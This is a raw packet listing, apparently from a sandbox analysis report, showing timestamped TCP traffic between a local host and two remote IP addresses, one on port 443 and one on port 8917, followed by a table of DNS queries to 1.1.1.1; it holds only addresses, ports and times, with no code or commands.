                                                                        Jan 14, 2025 05:18:15.327363014 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.331597090 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.331762075 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.331789017 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.334768057 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.334938049 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.334938049 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.335067987 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.337861061 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.338088036 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.343651056 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.343919039 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.347207069 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.347379923 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.347379923 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.352797985 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.352962971 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.353071928 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.356117964 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.356285095 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.356285095 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.359411955 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.359587908 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.359587908 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.365262032 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.365477085 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.365554094 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.371263027 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.371476889 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.371644020 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.374310017 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.374494076 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.374641895 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.377582073 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.377774000 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.383526087 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.383768082 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.386658907 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.386924982 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.392677069 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.392921925 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.395803928 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.395978928 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.395978928 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.399108887 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.399287939 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.399287939 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.399434090 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.404875040 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.405105114 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.407823086 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.408014059 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.408040047 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.413996935 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.414201021 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.414201021 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.417300940 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.417503119 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.417504072 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.420594931 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.420820951 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.426219940 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.426435947 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.429513931 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.429723978 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.435430050 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.435653925 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.438680887 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.438930988 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.439004898 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.444294930 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.444556952 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.444582939 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.447032928 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.447211027 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.447316885 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.449965954 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.450144053 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.450330019 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.455508947 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.455723047 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.458055019 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.458240986 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.458240986 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.458411932 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.463433027 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.463721037 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.466192961 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.466485023 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.468816042 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.469111919 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.473898888 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.474077940 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.474104881 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.476538897 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.476797104 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.481309891 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.481528997 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.481529951 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.483640909 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.483849049 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.483916044 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.486363888 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.486586094 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.491298914 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.491552114 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.493968010 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.494193077 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.494332075 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.497811079 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.497984886 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.497986078 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.500152111 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.500314951 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.500314951 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.500418901 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.502827883 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.503072023 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.503097057 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.507133007 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.507348061 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.507504940 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.511554956 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.511806965 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.515436888 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.515659094 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.516501904 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.516674042 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.516674042 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.520601988 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.520819902 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.520895004 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.522340059 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.522674084 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.526767015 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.527021885 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.527096033 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.529524088 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.529784918 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.529865026 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.531028986 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.531321049 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.531347036 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.534992933 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.535207987 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.535207987 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.537440062 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.537636042 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.537636042 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.541300058 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.541548967 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.543287992 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.543525934 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.543656111 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.545706987 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.545955896 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.549699068 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.549941063 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.553982973 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.554248095 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.554248095 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.554392099 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.555912971 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.556174994 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.556174994 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.556205034 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.558094978 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.558295965 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.558367014 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.562093019 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.562375069 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.564248085 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.564510107 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.564510107 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.564615965 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.568294048 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.568476915 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.568476915 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.570692062 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.570924044 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.572690964 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.572949886 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.573025942 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.576694012 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.576874018 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.576874018 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.579180956 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.579364061 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.579457045 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.583475113 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.583807945 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.585553885 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.585724115 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.585724115 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.587379932 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.587626934 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.591207027 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.591459036 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.593445063 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.593643904 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.593645096 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.597323895 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.597568989 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.599555969 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.599720955 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.599746943 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.601851940 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.602029085 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.602029085 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.605711937 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.605982065 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.607964993 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.608098984 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.608098984 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.612098932 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.612454891 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.612454891 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.614000082 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.614212036 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.628078938 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.628292084 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.629708052 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.629848957 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.629952908 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.631233931 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.631323099 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.631434917 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.631436110 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.631468058 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.631480932 CET44349775118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:15.631557941 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:15.631709099 CET49775443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:23.203887939 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:18:23.204161882 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:18:38.523097992 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:18:38.523329020 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:18:53.842323065 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:18:53.842566013 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:19:05.333620071 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:19:05.652026892 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:19:09.161097050 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:19:09.161276102 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:19:24.480693102 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:19:24.480905056 CET497698917192.168.11.208.217.78.242

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 14, 2025 05:10:57.204159975 CET6488253192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:10:58.175978899 CET53648821.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:12:12.671762943 CET5326953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:12:13.533178091 CET53532691.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:12:53.207953930 CET6190353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:12:53.338002920 CET53619031.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:12:59.367248058 CET5023953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:12:59.471040010 CET53502391.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:05.491422892 CET6528553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:05.594619036 CET53652851.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:11.614516020 CET5553853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:11.763982058 CET53555381.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:17.784975052 CET5625653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:17.914856911 CET53562561.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:23.940301895 CET6375553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:24.041477919 CET53637551.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:30.063613892 CET5159853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:30.213601112 CET53515981.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:35.359395981 CET5342753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:35.462896109 CET53534271.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:41.420543909 CET6517353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:41.523992062 CET53651731.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:47.028831005 CET5999553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:47.132245064 CET53599951.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:51.449480057 CET6381653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:51.552684069 CET53638161.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:13:56.276648998 CET6405453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:13:56.380443096 CET53640541.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:01.150371075 CET4930753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:01.253945112 CET53493071.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:06.149137974 CET5570853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:06.252711058 CET53557081.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:11.148158073 CET6502953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:11.250919104 CET53650291.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:16.147180080 CET5841853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:16.249376059 CET53584181.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:21.145895004 CET6290753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:21.249178886 CET53629071.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:26.160412073 CET5851253192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:26.265156031 CET53585121.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:31.159507990 CET5903153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:31.262764931 CET53590311.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:36.158358097 CET5433053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:36.259541988 CET53543301.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:41.157139063 CET5257653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:41.258558989 CET53525761.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:46.156056881 CET6201753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:46.260288954 CET53620171.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:51.155714035 CET5501153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:51.260515928 CET53550111.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:14:56.153960943 CET6358153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:14:56.256253004 CET53635811.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:01.152828932 CET6331553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:01.254369974 CET53633151.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:06.151746988 CET5962953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:06.252660990 CET53596291.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:11.150634050 CET5605653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:11.254977942 CET53560561.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:16.149523020 CET6331153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:16.253957033 CET53633111.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:21.148500919 CET5491353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:21.252125978 CET53549131.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:26.147471905 CET6126453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:26.249975920 CET53612641.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:31.161933899 CET5876653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:31.266736031 CET53587661.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:36.160902023 CET5006053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:36.261909008 CET53500601.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:41.159699917 CET4972653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:41.262761116 CET53497261.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:46.158787966 CET6307553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:46.260209084 CET53630751.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:51.157471895 CET5514053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:51.258359909 CET53551401.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:15:56.156359911 CET6408953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:15:56.257049084 CET53640891.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:01.155255079 CET6031553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:01.288924932 CET53603151.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:05.397124052 CET5981353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:06.054588079 CET53598131.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:06.154254913 CET5195553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:06.256436110 CET53519551.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:11.153374910 CET5856953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:11.263638020 CET53585691.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:16.152429104 CET6223053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:16.255970001 CET53622301.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:21.150974989 CET5558053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:21.252113104 CET53555801.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:26.149818897 CET5963253192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:26.252258062 CET53596321.1.1.1192.168.11.20
